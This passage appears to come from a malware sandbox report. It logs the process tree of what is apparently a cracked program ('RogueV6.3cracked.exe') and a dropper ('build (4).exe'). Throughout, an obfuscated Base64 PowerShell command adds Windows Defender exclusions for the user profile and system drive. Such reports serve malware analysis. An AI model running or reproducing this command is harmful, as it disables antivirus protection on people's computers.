        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        249⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        249⤵
        
        PID:9728
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        249⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        250⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        250⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        250⤵
        
        PID:7500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        251⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        251⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        251⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        252⤵
        
        PID:8408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        252⤵
        
        PID:8604
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        252⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        253⤵
        
        PID:8816
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        253⤵
        
        PID:9688
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        253⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        254⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        254⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        254⤵
        
        PID:8104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        255⤵
        
        PID:6548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        256⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        255⤵
        
        PID:9884
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        255⤵
        
        PID:692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        256⤵
        
        PID:7240
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        256⤵
        
        PID:9636
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        256⤵
        
        PID:10828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        257⤵
        
        PID:10848
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        257⤵
        
        PID:10536
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        257⤵
        
        PID:1384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        258⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        258⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        258⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        259⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        259⤵
        
        PID:10568
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        259⤵
        
        PID:9212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        260⤵
        
        PID:10712
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        260⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        260⤵
        
        PID:10588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        261⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        261⤵
        
        PID:9088
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        261⤵
        
        PID:10604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        262⤵
        
        PID:10764
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        262⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        262⤵
        
        PID:10088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        263⤵
        
        PID:9804
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        263⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        263⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        264⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        264⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        264⤵
        
        PID:10928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        265⤵
        
        PID:10640
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        265⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        265⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        266⤵
        
        PID:10200
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        266⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        266⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        267⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        267⤵
        
        PID:11036
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        267⤵
        
        PID:10636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        268⤵
        
        PID:10988
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        268⤵
        
        PID:11108
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        268⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        269⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        269⤵
        
        PID:10964
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        269⤵
        
        PID:1340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        270⤵
        
        PID:10500
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        270⤵
        
        PID:8836
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        270⤵
        
        PID:852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        271⤵
        
        PID:10844
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        271⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        271⤵
        
        PID:3408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        272⤵
        
        PID:9496
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        272⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        272⤵
        
        PID:420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        273⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        273⤵
        
        PID:11068
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        273⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        274⤵
        
        PID:8888
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        274⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        274⤵
        
        PID:10384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        275⤵
        
        PID:10300
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        275⤵
        
        PID:9224
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        275⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
